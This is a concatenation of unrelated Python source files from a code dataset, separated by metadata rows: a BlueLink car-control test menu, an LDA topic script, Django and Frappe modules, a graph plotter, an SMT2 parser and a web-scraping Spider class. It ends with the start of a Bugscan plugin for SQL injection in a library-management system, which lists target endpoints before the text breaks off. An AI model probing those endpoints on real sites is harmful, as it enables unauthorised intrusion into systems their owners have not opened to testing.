                        "hand": [c.rank for c in game.AI.hand],
                        "played": [c.rank for c in game.AI.played_cards],
                        "coins": game.AI.coins,
                        "score": game.AI.get_current_score()
                    },
                    "game": {
                        "open": [c.rank for c in game.open_deck.cards],
                        "cards_in_play": list(game.cards_in_play),
                        "round": game.current_round
                    }
                    })
| 38.897059 | 107 | 0.483554 |
c921d773c35312ecebe3d4b6eaaaef9e999e9c07 | 4,905 | py | Python | bluvo_test.py | JanJaapKo/BlUVO | 2a72b06a56069fee5bd118a12b846513096014b1 | [
"MIT"
] | null | null | null | bluvo_test.py | JanJaapKo/BlUVO | 2a72b06a56069fee5bd118a12b846513096014b1 | [
"MIT"
] | null | null | null | bluvo_test.py | JanJaapKo/BlUVO | 2a72b06a56069fee5bd118a12b846513096014b1 | [
"MIT"
] | null | null | null | import time
import logging
import pickle
import json
import consolemenu
from generic_lib import georeverse, geolookup
from bluvo_main import BlueLink
from tools.stamps import postOffice
from params import * # p_parameters are read
# Log everything to bluvo_test.log with timestamp/level/file context.
logging.basicConfig(format='%(asctime)s - %(levelname)-8s - %(filename)-18s - %(message)s', filename='bluvo_test.log',
                    level=logging.DEBUG)
# Console menu entries; the leading number is what the user types below.
menuoptions = ['0 exit',"1 Lock", "2 Unlock", "3 Status", "4 Status formatted", "5 Status refresh", "6 location", "7 loop status",
               "8 Navigate to", '9 set Charge Limits', '10 get charge schedule', '11 get services', '12 poll car', '13 get stamps', '14 odometer', '15 get park location',
               '16 get user info', '17 get monthly report', '18 get monthly report lists']
mymenu = consolemenu.SelectionMenu(menuoptions)
# heartbeatinterval, initsuccess = initialise(p_email, p_password, p_pin, p_vin, p_abrp_token, p_abrp_carmodel, p_WeatherApiKey,
#                                             p_WeatherProvider, p_homelocation, p_forcepollinterval, p_charginginterval,
#                                             p_heartbeatinterval)
# Credentials and tuning values come from params.py via the star import above.
bluelink = BlueLink(p_email, p_password, p_pin, p_vin, p_abrp_carmodel, p_abrp_token, p_WeatherApiKey, p_WeatherProvider, p_homelocation)
bluelink.initialise(p_forcepollinterval, p_charginginterval)
if bluelink.initSuccess:
    #stampie = postOffice("hyundai", False)
    # Interactive test harness: print the menu, read a choice, dispatch to
    # the matching BlueLink API call. Loops until option 0 (exit).
    while True:
        for i in menuoptions:
            print(i)
        #try:
        x = int(input("Please Select:"))
        print(x)
        if x == 0: exit()
        if x == 1: bluelink.vehicle.api_set_lock('on')
        if x == 2: bluelink.vehicle.api_set_lock('off')
        if x == 3: print(bluelink.vehicle.api_get_status(False))
        if x == 4:
            # One "key: value" line per status field.
            status_record = bluelink.vehicle.api_get_status(False, False)
            for thing in status_record:
                print(thing + ": " + str(status_record[thing]))
        if x == 5: print(bluelink.vehicle.api_get_status(True))
        if x == 6:
            locatie = bluelink.vehicle.api_get_location()
            if locatie:
                locatie = locatie['gpsDetail']['coord']
                print(georeverse(locatie['lat'], locatie['lon']))
        if x == 7:
            # Endless polling loop; 'semaphore.pkl' is an external flag file
            # another process can write to force an immediate poll.
            while True:
                # read semaphore flag
                try:
                    with open('semaphore.pkl', 'rb') as f:
                        manualForcePoll = pickle.load(f)
                except:
                    manualForcePoll = False
                print(manualForcePoll)
                updated, parsedStatus, afstand, googlelocation = bluelink.pollcar(manualForcePoll)
                # clear semaphore flag
                manualForcePoll = False
                with open('semaphore.pkl', 'wb') as f:
                    pickle.dump(manualForcePoll, f)
                if updated:
                    # Output labels are Dutch (distance/heading/speed/odometer).
                    print('afstand van huis, rijrichting, snelheid en km-stand: ', afstand, ' / ',
                          parsedStatus['heading'], '/', parsedStatus['speed'], '/', parsedStatus['odometer'])
                    print(googlelocation)
                    print("range ", parsedStatus['range'], "soc: ", parsedStatus['chargeHV'])
                    if parsedStatus['charging']: print("Laden")
                    if parsedStatus['trunkopen']: print("kofferbak open")
                    if not (parsedStatus['locked']): print("deuren van slot")
                    if parsedStatus['dooropenFL']: print("bestuurdersportier open")
                    print("soc12v ", parsedStatus['charge12V'], "status 12V", parsedStatus['status12V'])
                    print("=============")
                time.sleep(bluelink.heartbeatinterval)
        if x == 8: print(bluelink.vehicle.api_set_navigation(geolookup(input("Press Enter address to navigate to..."))))
        if x == 9:
            # Accept space/comma/semicolon/colon separated "fast slow" limits.
            invoer = input("Enter maximum for fast and slow charging (space or comma or semicolon or colon seperated)")
            for delim in ',;:': invoer = invoer.replace(delim, ' ')
            print(bluelink.vehicle.api_set_chargelimits(invoer.split()[0], invoer.split()[1]))
        if x == 10: print(json.dumps(bluelink.vehicle.api_get_chargeschedule(),indent=4))
        if x == 11: print(bluelink.vehicle.api_get_services())
        if x == 12: print(str(bluelink.pollcar(True)))
        if x == 13:
            print( "feature removed")
        if x == 14: print(bluelink.vehicle.api_get_odometer())
        if x == 15: print(bluelink.vehicle.api_get_parklocation())
        if x == 16: print(bluelink.vehicle.api_get_userinfo())
        if x == 17: print(bluelink.vehicle.api_get_monthlyreport(2021,5))
        if x == 18: print(bluelink.vehicle.api_get_monthlyreportlist())
        input("Press Enter to continue...")
    # except (ValueError) as err:
    # print("error in menu keuze")
else:
logging.error("initialisation failed")
| 50.56701 | 171 | 0.601019 |
c92214401251c6b4745f3ba05c668f2913227e7f | 2,962 | py | Python | lda/test3/interpret_topics.py | kaiiam/amazon-continuation | 9faaba80235614e6eea3e305c423975f2ec72e3e | [
"MIT"
] | null | null | null | lda/test3/interpret_topics.py | kaiiam/amazon-continuation | 9faaba80235614e6eea3e305c423975f2ec72e3e | [
"MIT"
] | null | null | null | lda/test3/interpret_topics.py | kaiiam/amazon-continuation | 9faaba80235614e6eea3e305c423975f2ec72e3e | [
"MIT"
] | 1 | 2019-05-28T21:49:45.000Z | 2019-05-28T21:49:45.000Z | #!/usr/bin/env python3
"""
Author : kai
Date : 2019-06-26
Purpose: Rock the Casbah
"""
import argparse
import sys
import re
import csv
# --------------------------------------------------
def get_args():
    """Build the CLI parser and return the parsed command-line arguments."""
    parser = argparse.ArgumentParser(
        description='Argparse Python script',
        formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    parser.add_argument('-a', '--arg',
                        help='A named string argument',
                        metavar='str', type=str, default='')
    parser.add_argument('-i', '--int',
                        help='A named integer argument',
                        metavar='int', type=int, default=0)
    parser.add_argument('-f', '--flag',
                        help='A boolean flag', action='store_true')
    return parser.parse_args()
# --------------------------------------------------
def warn(msg):
    """Print a message to STDERR"""
    sys.stderr.write("{}\n".format(msg))
# --------------------------------------------------
def die(msg='Something bad happened'):
    """Print *msg* to STDERR and exit the process with status 1."""
    # warn() inlined here so the helper is self-contained; it performed
    # exactly this stderr print.
    print(msg, file=sys.stderr)
    sys.exit(1)
# --------------------------------------------------
def main():
    """Map LDA topic terms to InterPro entry names and write output_topics.tsv.

    Reads 'InterPro_entry_list.tsv' (accession -> entry name lookup) and
    'model_topics.txt' (a printed gensim topic list), and writes one TSV row
    per InterPro-bearing topic term: topic id, model coefficient, InterPro
    accession, and its human-readable entry name (blank when unknown).
    """
    # Keep the CLI side effects (--help, argument validation); the parsed
    # values themselves were never used by the original either.
    get_args()
    # Accession -> entry-name lookup table.
    intpro_dict = {}
    with open('InterPro_entry_list.tsv') as csvfile:
        reader = csv.DictReader(csvfile, delimiter='\t')
        for row in reader:
            intpro_dict[row['ENTRY_AC']] = row['ENTRY_NAME']
    # Flatten the topic dump and strip Python list/str punctuation so only
    # "(topic, term*coef ...)" fragments remain.
    with open('model_topics.txt', 'r') as file:
        model_topics = file.read().replace('\n', '')
    for ch in ("'", "[", "]"):
        model_topics = model_topics.replace(ch, "")
    mtl = model_topics.split('), ')
    # Hoisted: the original recompiled this pattern once per topic.
    id_re = re.compile(r'IPR\d{3}')
    with open('output_topics.tsv', 'w') as f:
        print('Topic\tModel_coefficient\tInterpro_ID\tInterPro_ENTRY_NAME', file=f)
        for topic_str in mtl:
            # Second character of the fragment is the topic number
            # (fragments look like "(3, ...").
            topic = topic_str[1]
            # Keep only tokens containing an InterPro accession; drop quotes.
            c_words = [re.sub('"', '', w) for w in topic_str.split()
                       if id_re.search(w)]
            for w in c_words:
                # Bug fix: the original called re.sub here and discarded the
                # result, so trailing ')' was never actually removed.
                w = re.sub(r'\)', '', w)
                coef, intpro = w.split('*')
                # Accessions are 9 characters (IPR + 6 digits).
                intpro = intpro[:9]
                label = intpro_dict.get(intpro, '')
                print('{}\t{}\t{}\t{}'.format(topic, coef, intpro, label), file=f)
# --------------------------------------------------
if __name__ == '__main__':
main()
| 26.684685 | 83 | 0.497637 |
c924841b1d689ef522dd4926df95b7101d1bb341 | 292 | py | Python | app/users/urls.py | ManojKumarMRK/recipe-app-api | f518e91fc335c46eb1034d865256c94bb3e56b32 | [
"MIT"
] | null | null | null | app/users/urls.py | ManojKumarMRK/recipe-app-api | f518e91fc335c46eb1034d865256c94bb3e56b32 | [
"MIT"
] | null | null | null | app/users/urls.py | ManojKumarMRK/recipe-app-api | f518e91fc335c46eb1034d865256c94bb3e56b32 | [
"MIT"
] | null | null | null | from django.urls import path
from users import views
# Namespace used when reversing these routes, e.g. "users:create".
app_name = 'users'
# Create-account, obtain-token, and manage-own-profile endpoints.
urlpatterns = [
    path('create/',views.CreateUserView.as_view(),name='create'),
    path('token/',views.CreateTokenView.as_view(),name='token'),
    path('me/', views.ManageUserView.as_view(),name='me'),
] | 26.545455 | 66 | 0.674658 |
c92510f03e8c86ab8acb7443fa38d2785d4a3bca | 4,200 | py | Python | archive/visualization/network.py | ajrichards/bayesian-examples | fbd87c6f1613ea516408e9ebc3c9eff1248246e4 | [
"BSD-3-Clause"
] | 2 | 2016-01-27T08:51:23.000Z | 2017-04-17T02:21:34.000Z | archive/visualization/network.py | ajrichards/notebook | fbd87c6f1613ea516408e9ebc3c9eff1248246e4 | [
"BSD-3-Clause"
] | null | null | null | archive/visualization/network.py | ajrichards/notebook | fbd87c6f1613ea516408e9ebc3c9eff1248246e4 | [
"BSD-3-Clause"
] | null | null | null | import matplotlib as mpl
import matplotlib.pyplot as plt
import networkx as nx
import pandas as pd
def get_a_dict(filepath):
    """Load the transitions table and extract the interesting theme rows.

    Parameters
    ----------
    filepath : str
        Path to a CSV whose columns 1..12 hold alternating event/score
        values for each topic row.

    Returns
    -------
    dict
        Maps each theme name to ``[events, scores]`` where *events* is the
        row's even-positioned columns and *scores* the odd-positioned ones.
    """
    df = pd.read_csv(filepath).iloc[:, 1:13]
    interesting_theme_idx = [3, 6, 11, 15, 16]
    theme_names = ['Horrendous IVR', 'Mobile Disengagement', "Couldn't Find it Online", "Mobile Users", "Just Show Me the Summary"]
    theme_dict = {}
    # pair each label with its row index instead of tracking a manual counter
    for name, row_num in zip(theme_names, interesting_theme_idx):
        theme_dict[name] = [df.iloc[row_num, ::2], df.iloc[row_num, 1::2]]
    return theme_dict
def draw_graph(edgeWeights,plotName='network_graph.png'):
    """Draw the topic/event bipartite network and save it to *plotName*.

    edgeWeights -- dict keyed by edge name (e.g. 't1e1') with float weights;
                   edges with weight 0.0 are drawn as dashed black lines.
    plotName    -- output image path (default 'network_graph.png').
    """
    # edge name -> (topic node, event node) endpoints
    edgeDict = {"t1e1":("T1","E1"), "t1e2":("T1","E2"), "t1e6":("T1","E6"), "t2e4":("T2","E4"), "t2e5":("T2","E5"), "t2e6":("T2","E6"), "t3e3":("T3","E3"), "t3e4":("T3","E4"), "t3e5":("T3","E5")}
    ## initialize the graph
    G = nx.Graph()
    for node in ["T1","T2","T3","E1","E2","E3","E4", "E5", "E6"]:
        G.add_node(node)
    # .items() instead of the Python-2-only .iteritems()
    for edgeName,edge in edgeDict.items():
        G.add_edge(edge[0],edge[1],weight=edgeWeights[edgeName])
    # explicitly set positions: topics on the top row, events on the bottom
    pos={"T1":(2,2),
         "T2":(3.5,2),
         "T3":(5,2),
         "E1":(1,1),
         "E2":(2,1),
         "E3":(3,1),
         "E4":(4,1),
         "E5": (5, 1),
         "E6": (6, 1)}
    ## get insignificant edges
    isEdges = [(u,v) for (u,v,d) in G.edges(data=True) if d['weight'] ==0.0]
    # plot the network
    nodeSize = 2000
    # Graph.edges(data=True) replaces edges_iter, which was removed in networkx 2.x
    colors = [edge[2]['weight'] for edge in G.edges(data=True)]
    cmap = plt.cm.winter
    fig = plt.figure(figsize=(12,6))
    fig.suptitle('Word Theme Probabilities', fontsize=14, fontweight='bold')
    ax = fig.add_axes([0.355, 0.0, 0.7, 1.0])
    nx.draw(G,pos,node_size=nodeSize,edge_color=colors,width=4,edge_cmap=cmap,edge_vmin=-0.5,edge_vmax=0.5,ax=ax, with_labels=True)
    # NOTE(review): draw_networkx_nodes may reject the with_labels kwarg on
    # newer networkx releases -- confirm against the pinned version.
    nx.draw_networkx_nodes(G,pos,node_size=nodeSize,nodelist=["T1","T2","T3"],node_color='#F2F2F2',with_labels=True)
    nx.draw_networkx_nodes(G,pos,node_size=nodeSize,nodelist=["E1","E2","E3","E4", "E5", "E6"],node_color='#0066FF',with_labels=True)
    nx.draw_networkx_edges(G,pos,edgelist=isEdges,width=1,edge_color='k',style='dashed')
    ## add a colormap
    ax1 = fig.add_axes([0.03, 0.05, 0.35, 0.14])
    norm = mpl.colors.Normalize(vmin=0.05, vmax=.2)
    mpl.colorbar.ColorbarBase(ax1,cmap=cmap,
                              norm=norm,
                              orientation='horizontal')
    # add an axis for the legend
    ax2 = fig.add_axes([0.03,0.25,0.35,0.65]) # l,b,w,h
    ax2.set_yticks([])
    ax2.set_xticks([])
    ax2.set_frame_on(True)
    fontSize = 10
    ax2.text(0.1,0.9,r"$T1$ = Horrendous IVR" ,color='k',fontsize=fontSize,ha="left", va="center")
    ax2.text(0.1,0.8,r"$T2$ = Mobile Disengagement" ,color='k',fontsize=fontSize,ha="left", va="center")
    ax2.text(0.1,0.7,r"$T3$ = Mobile Users" ,color='k',fontsize=fontSize,ha="left", va="center")
    ax2.text(0.1,0.6,r"$E1$ = agent.transfer->ivr.exit" ,color='k',fontsize=fontSize,ha="left", va="center")
    ax2.text(0.1,0.5,r"$E2$ = agent.assigned->call.transfer" ,color='k',fontsize=fontSize,ha="left", va="center")
    ax2.text(0.1,0.4,r"$E3$ = sureswip.login->view.account.summary" ,color='k',fontsize=fontSize,ha="left", va="center")
    ax2.text(0.1,0.3,r"$E4$ = mobile.exit->mobile.entry" ,color='k',fontsize=fontSize,ha="left", va="center")
    ax2.text(0.1,0.2,r"$E5$ = mobile.exit->journey.exit" ,color='k',fontsize=fontSize,ha="left", va="center")
    ax2.text(0.1,0.1,r"$E6$ = ivr.entry->ivr.proactive.balance" ,color='k',fontsize=fontSize,ha="left", va="center")
    plt.savefig(plotName)
if __name__ == "__main__":
    filepath = '../word_transition_model/data/transitions_df.csv'
    data_dict = get_a_dict(filepath)
    # NOTE(review): summary/summary_events/summary_scores are computed but
    # never used below -- presumably left over from exploration.
    summary = data_dict['Just Show Me the Summary']
    summary_events = summary[0]
    summary_scores = summary[1]
    # hand-tuned edge weights (not taken from the loaded data)
    edge_weights = {"t1e1":0.14, "t1e2":0.13, "t1e6":0.12, "t2e4":0.05, "t2e5":0.16, "t2e6":0.0, "t3e3":0.3, "t3e4":0.1, "t3e5":0.04}
    draw_graph(edge_weights)
| 44.680851 | 196 | 0.61381 |
c926f1cc84ef2be7db59c1ebc4dd4db9c3aeb3e1 | 332 | py | Python | accounting_app/accounting_app/doctype/gl_entry/gl_entry.py | imdadhussain/accounting_app | 0f4b54242d81953c0c3ece3fb098701e86ce0eaf | [
"MIT"
] | null | null | null | accounting_app/accounting_app/doctype/gl_entry/gl_entry.py | imdadhussain/accounting_app | 0f4b54242d81953c0c3ece3fb098701e86ce0eaf | [
"MIT"
] | null | null | null | accounting_app/accounting_app/doctype/gl_entry/gl_entry.py | imdadhussain/accounting_app | 0f4b54242d81953c0c3ece3fb098701e86ce0eaf | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright (c) 2021, BS and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
from frappe.utils.nestedset import get_descendants_of
from frappe.utils import flt
class GLEntry(Document):
pass
| 25.538462 | 53 | 0.789157 |
c926fbd01b5a51930f76ba3ff40785e357d452a6 | 574 | py | Python | main/migrations/0002_auto_20200314_1530.py | kwatog/jumuk | 6234bf18ea0bf1eeb4194ecce23af9b669d4a841 | [
"MIT"
] | null | null | null | main/migrations/0002_auto_20200314_1530.py | kwatog/jumuk | 6234bf18ea0bf1eeb4194ecce23af9b669d4a841 | [
"MIT"
] | 5 | 2020-03-13T09:48:40.000Z | 2021-09-22T18:42:22.000Z | main/migrations/0002_auto_20200314_1530.py | kwatog/jumuk | 6234bf18ea0bf1eeb4194ecce23af9b669d4a841 | [
"MIT"
] | null | null | null | # Generated by Django 3.0.4 on 2020-03-14 15:30
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated by Django 3.0.4: relaxes main.User.first_name and
    # last_name to allow blank and NULL values (max_length stays 32).
    dependencies = [
        ('main', '0001_initial'),
    ]
    operations = [
        migrations.AlterField(
            model_name='user',
            name='first_name',
            field=models.CharField(blank=True, max_length=32, null=True),
        ),
        migrations.AlterField(
            model_name='user',
            name='last_name',
            field=models.CharField(blank=True, max_length=32, null=True),
        ),
    ]
| 23.916667 | 73 | 0.578397 |
c92cee00e5a3f53b6fcf563376119be5a8fa6b38 | 645 | py | Python | fusion/dataset/mnist_svhn/transforms.py | Mrinal18/fusion | 34e563f2e50139385577c3880c5de11f8a73f220 | [
"BSD-3-Clause"
] | 14 | 2021-04-05T01:25:12.000Z | 2022-02-17T19:44:28.000Z | fusion/dataset/mnist_svhn/transforms.py | Mrinal18/fusion | 34e563f2e50139385577c3880c5de11f8a73f220 | [
"BSD-3-Clause"
] | 1 | 2021-07-05T08:32:49.000Z | 2021-07-05T12:34:57.000Z | fusion/dataset/mnist_svhn/transforms.py | Mrinal18/fusion | 34e563f2e50139385577c3880c5de11f8a73f220 | [
"BSD-3-Clause"
] | 1 | 2022-02-01T21:56:11.000Z | 2022-02-01T21:56:11.000Z | from torch import Tensor
from torchvision import transforms
class SVHNTransform:
    """Preprocessing for SVHN images: convert the input to a torch tensor."""

    def __call__(self, x) -> Tensor:
        """Apply the transform.

        Args:
            x: Input image (any type accepted by torchvision's ToTensor).

        Returns:
            The image as a tensor.
        """
        to_tensor = transforms.ToTensor()
        return to_tensor(x)
class MNISTTransform:
    """Preprocessing for MNIST images: resize to 32x32, then to tensor."""

    def __call__(self, x) -> Tensor:
        """Apply the transform.

        Args:
            x: Input image (any type accepted by torchvision transforms).

        Returns:
            The resized image as a tensor.
        """
        resized = transforms.Resize((32, 32))(x)
        return transforms.ToTensor()(resized)
| 17.916667 | 42 | 0.493023 |
c92dbb28d5fa5849ee22ef3b509bd866ce701e9e | 1,508 | py | Python | scripts/previousScripts-2015-12-25/getVariableInfo.py | mistryrakesh/SMTApproxMC | 7c97e10c46c66e52c4e8972259610953c3357695 | [
"MIT"
] | null | null | null | scripts/previousScripts-2015-12-25/getVariableInfo.py | mistryrakesh/SMTApproxMC | 7c97e10c46c66e52c4e8972259610953c3357695 | [
"MIT"
] | null | null | null | scripts/previousScripts-2015-12-25/getVariableInfo.py | mistryrakesh/SMTApproxMC | 7c97e10c46c66e52c4e8972259610953c3357695 | [
"MIT"
] | null | null | null | #!/home/rakeshmistry/bin/Python-3.4.3/bin/python3
# @author: rakesh mistry - 'inspire'
# @date: 2015-08-06
import sys
import re
import os
import math
# Function: parseSmt2FileVariables
def parseSmt2FileVariables(smt2File):
    """Scan an SMT-LIB2 stream for (declare-fun ...) lines.

    smt2File: an iterable of lines (open file object or list of strings).
    Returns a dict mapping variable name -> bit width (int); declarations
    whose trailing width token is not a plain integer (e.g. Bool) are
    skipped.
    """
    declaration = re.compile("[ \t]*\(declare-fun")
    widths = {}
    for line in smt2File:
        if not declaration.search(line):
            continue
        tokens = line.split()
        name = tokens[1]
        width = tokens[-1].rstrip(")")
        if width.isdigit():
            widths[name] = int(width)
    return widths
# Function: main
def main(argv):
    """Summarize an SMT2 file's variable declarations into one output line.

    argv: [script_name, input_SMT2_file, output_file]. Writes
    'maxBitwidth;numVars;multiBitVars;singleBitVars' to the output file.
    Exits with status 1 on bad arguments.
    """
    # check for correct number of arguments
    scriptName = os.path.basename(__file__)
    if len(argv) < 3:
        sys.stderr.write("Error: Invalid arguments.\n")
        sys.stderr.write("    [Usage]: " + scriptName + " <input_SMT2_file> <output_file>\n")
        sys.exit(1)

    # 'with' guarantees the handle is closed (the original leaked the input file)
    with open(argv[1], "r") as inputSMTFile:
        varMap = parseSmt2FileVariables(inputSMTFile)

    # default=0 guards against a file with no bit-vector declarations,
    # where max() over an empty dict would raise ValueError
    maxBitwidth = max(varMap.values(), default=0)
    multiBitVars = sum(1 for width in varMap.values() if width > 1)
    singleBitVars = len(varMap) - multiBitVars

    with open(argv[2], "w") as finalOutputFile:
        finalOutputFile.write(str(maxBitwidth) + ";" + str(len(varMap)) + ";" + str(multiBitVars) + ";" + str(singleBitVars))
if __name__ == "__main__":
    # entry point: hand the raw command-line arguments to main()
    main(sys.argv)
| 25.133333 | 121 | 0.611406 |
c92faeda80f7623d46a23810d5c128754efcada2 | 9,880 | py | Python | simplified_scrapy/core/spider.py | yiyedata/simplified-scrapy | ccfdc686c53b2da3dac733892d4f184f6293f002 | [
"Apache-2.0"
] | 7 | 2019-08-11T10:31:03.000Z | 2021-03-08T10:07:52.000Z | simplified_scrapy/core/spider.py | yiyedata/simplified-scrapy | ccfdc686c53b2da3dac733892d4f184f6293f002 | [
"Apache-2.0"
] | 1 | 2020-12-29T02:30:18.000Z | 2021-01-25T02:49:37.000Z | simplified_scrapy/core/spider.py | yiyedata/simplified-scrapy | ccfdc686c53b2da3dac733892d4f184f6293f002 | [
"Apache-2.0"
] | 4 | 2019-10-22T02:14:35.000Z | 2021-05-13T07:01:56.000Z | #!/usr/bin/python
#coding=utf-8
import json, re, logging, time, io, os
import sys
from simplified_scrapy.core.config_helper import Configs
from simplified_scrapy.core.sqlite_cookiestore import SqliteCookieStore
from simplified_scrapy.core.request_helper import requestPost, requestGet, getResponseStr, extractHtml
from simplified_scrapy.core.utils import convertTime2Str, convertStr2Time, printInfo, absoluteUrl
from simplified_scrapy.core.regex_helper import *
from simplified_scrapy.core.sqlite_urlstore import SqliteUrlStore
from simplified_scrapy.core.sqlite_htmlstore import SqliteHtmlStore
from simplified_scrapy.core.obj_store import ObjStore
class Spider():
name = None
models = None
concurrencyPer1s = 1
use_cookie = True
use_ip = False # globle
version = "0.0.1"
request_timeout = None
allowed_domains = []
excepted_domains = []
custom_down = False # globle
useragent = None
proxyips = None
logged_in = False
login_data = None
refresh_urls = False
stop = False
encodings = {}
request_tm = False
save_html = True
def __init__(self, name=None):
try:
if name is not None:
self.name = name
elif not getattr(self, 'name', None):
raise ValueError("%s must have a name" % type(self).__name__)
if not hasattr(self, 'start_urls'):
self.start_urls = []
if not hasattr(self, 'url_store'):
self.url_store = SqliteUrlStore(self.name)
if not hasattr(self, 'html_store'):
self.html_store = SqliteHtmlStore(self.name)
if not hasattr(self, "obj_store"):
self.obj_store = ObjStore(self.name)
if not hasattr(self, "cookie_store"):
self.cookie_store = SqliteCookieStore()
if not self.refresh_urls:
self.url_store.saveUrl(self.start_urls, 0)
else:
self.url_store.resetUrls(self.start_urls)
self.listA = listA
self.listImg = listImg
self.getElementsByTag = getElementsByTag
self.getElementByID = getElementByID
self.getElementsByClass = getElementsByClass
self.getElementByTag = getElementByTag
self.getElementByClass = getElementByClass
self.getElement = getElement
self.getElements = getElements
self.getElementByAttr = getElementByAttr
self.getParent = getParent
self.getChildren = getChildren
self.getNexts = getNexts
self.getSection = getSection
self.removeHtml = removeHtml
self.trimHtml = trimHtml
self.removeScripts = removeScripts
self.tm = 0
self.absoluteUrl = absoluteUrl
except Exception as err:
self.log(err, logging.ERROR)
def log(self, msg, level=logging.DEBUG):
printInfo(msg)
logger = logging.getLogger()
logging.LoggerAdapter(logger, None).log(level, msg)
def login(self, obj=None):
if (not obj): obj = self.login_data
if (obj and obj.get('url')):
data = obj.get('data')
if (obj.get('method') == 'get'):
return requestGet(obj.get('url'), obj.get('headers'),
obj.get('useProxy'), self)
else:
return requestPost(obj.get('url'), data, obj.get('headers'),
obj.get('useProxy'), self)
else:
return False
def getCookie(self, url):
if (self.use_cookie and self.cookie_store):
return self.cookie_store.getCookie(url)
return None
def setCookie(self, url, cookie):
if (self.use_cookie and self.cookie_store and cookie):
self.cookie_store.setCookie(url, cookie)
def beforeRequest(self, url, request, extra=None):
cookie = self.getCookie(url)
if (cookie):
if sys.version_info.major == 2:
request.add_header('Cookie', cookie)
else:
request.add_header('Cookie', cookie)
return request
def afterResponse(self, response, url, error=False, extra=None):
html = getResponseStr(response, url, self, error)
if sys.version_info.major == 2:
cookie = response.info().getheaders('Set-Cookie')
else:
cookie = response.info().get('Set-Cookie')
self.setCookie(url, cookie)
return html
def renderUrl(self, url, callback):
printInfo('Need to implement method "renderUrl"')
def customDown(self, url):
printInfo('Need to implement method "customDown"')
def popHtml(self, state=0):
return self.html_store.popHtml(state)
def saveHtml(self, url, html):
if (html):
if self.save_html:
self.html_store.saveHtml(url, html)
else:
return self.extract(Dict(url), html, None, None)
def updateHtmlState(self, id, state):
self.html_store.updateState(id, state)
def downloadError(self, url, err=None):
printInfo('error url:', url, err)
self.url_store.updateState(url, 2)
def isPageUrl(self, url):
if (not url):
return False
if ("html.htm.jsp.asp.php".find(url[-4:].lower()) >= 0):
return True
if ('.jpg.png.gif.bmp.rar.zip.pdf.doc.xls.ppt.exe.avi.mp4'.find(
url[-4:].lower()) >= 0
or '.jpeg.xlsx.pptx.docx'.find(url[-5:].lower()) >= 0
or '.rm'.find(url[-3:].lower()) >= 0):
return False
return True
def urlFilter(self, url):
if (self.excepted_domains):
for d in self.excepted_domains:
if (url.find(d) > -1): return False
if (self.allowed_domains):
for d in self.allowed_domains:
if (url.find(d) > -1): return True
return False
return True
def _urlFilter(self, urls):
tmp = []
for url in urls:
u = url['url']
if u and self.urlFilter(u):
tmp.append(url)
return tmp
def saveData(self, data):
if (data):
if (not isinstance(data, list) and not isinstance(data, dict)):
objs = json.loads(data)
elif isinstance(data, dict):
objs = [data]
else:
objs = data
for obj in objs:
if (obj.get("Urls")):
self.saveUrl(obj.get("Urls"))
ds = obj.get("Data")
if (ds):
if isinstance(ds, list):
for d in ds:
self.saveObj(d)
else:
self.saveObj(ds)
def saveObj(self, data):
self.obj_store.saveObj(data)
def extract(self, url, html, models, modelNames):
if (not modelNames):
return False
else:
return extractHtml(url["url"], html, models, modelNames,
url.get("title"))
_downloadPageNum = 0
_startCountTs = time.time()
def checkConcurrency(self):
tmSpan = time.time() - self._startCountTs
if (self._downloadPageNum > (self.concurrencyPer1s * tmSpan)):
return False
self._startCountTs = time.time()
self._downloadPageNum = 0
return True
def popUrl(self):
if (self.checkConcurrency()):
url = self.url_store.popUrl()
if url: self._downloadPageNum = self._downloadPageNum + 1
return url
else:
return {}
return None
def urlCount(self):
return self.url_store.getCount()
def saveUrl(self, urls):
if not urls: return
if not isinstance(urls, list): urls = [urls]
u = urls[0]
if isinstance(u, str):
if u.startswith('http'):
urls = [{'url': url} for url in urls]
else:
logging.warn('Bad link data')
return
elif not u.get('url'):
if u.get('href'):
for url in urls:
url['url'] = url.get('href')
elif u.get('src'):
for url in urls:
url['url'] = url.get('src')
else:
logging.warn('Link data has no url attribute')
return
urls = self._urlFilter(urls)
self.url_store.saveUrl(urls)
def plan(self):
return []
def clearUrl(self):
self.url_store.clearUrl()
def resetUrlsTest(self):
self.url_store.resetUrls(self.start_urls)
def resetUrls(self, plan):
if (plan and len(plan) > 0):
for p in plan:
now = time.localtime()
hour = now[3]
minute = now[4]
if (p.get('hour')):
hour = p.get('hour')
if (p.get('minute')):
minute = p.get('minute')
planTime = time.strptime(
u"{}-{}-{} {}:{}:00".format(now[0], now[1], now[2], hour,
minute), "%Y-%m-%d %H:%M:%S")
configKey = u"plan_{}".format(self.name)
_lastResetTime = Configs().getValue(configKey)
if (now > planTime
and (not _lastResetTime
or float(_lastResetTime) < time.mktime(planTime))):
self.url_store.resetUrls(self.start_urls)
Configs().setValue(configKey, float(time.mktime(planTime)))
return True
return False
| 34.666667 | 102 | 0.542611 |
c92fe0a2d25d872fa12d88c6134dd6759ab24310 | 1,457 | py | Python | Bugscan_exploits-master/exp_list/exp-2469.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 11 | 2020-05-30T13:53:49.000Z | 2021-03-17T03:20:59.000Z | Bugscan_exploits-master/exp_list/exp-2469.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 6 | 2020-05-13T03:25:18.000Z | 2020-07-21T06:24:16.000Z | Bugscan_exploits-master/exp_list/exp-2469.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 6 | 2020-05-30T13:53:51.000Z | 2020-12-01T21:44:26.000Z | #!/usr/bin/evn python
#--coding:utf-8--*--
#Name:天睿电子图书管理系统系统10处注入打包 避免重复
#Refer:http://www.wooyun.org/bugs/wooyun-2015-0120852/
#Author:xq17
def assign(service, arg):
    """Claim targets for the 'tianrui_lib' service; any other service is
    declined (implicitly returns None)."""
    return (True, arg) if service == "tianrui_lib" else None
def audit(arg):
    """Probe known endpoints of the target (arg is the base URL) for SQL
    injection; relies on the scanner framework's globals `curl` and
    `security_hole` (presumably injected at load time -- see the dummy
    import in the __main__ guard).
    """
    # candidate endpoints, each with a bare query parameter to inject into
    urls = [
        arg + 'gl_tj_0.asp?id=1',
        arg + 'gl_tuijian_1.asp',
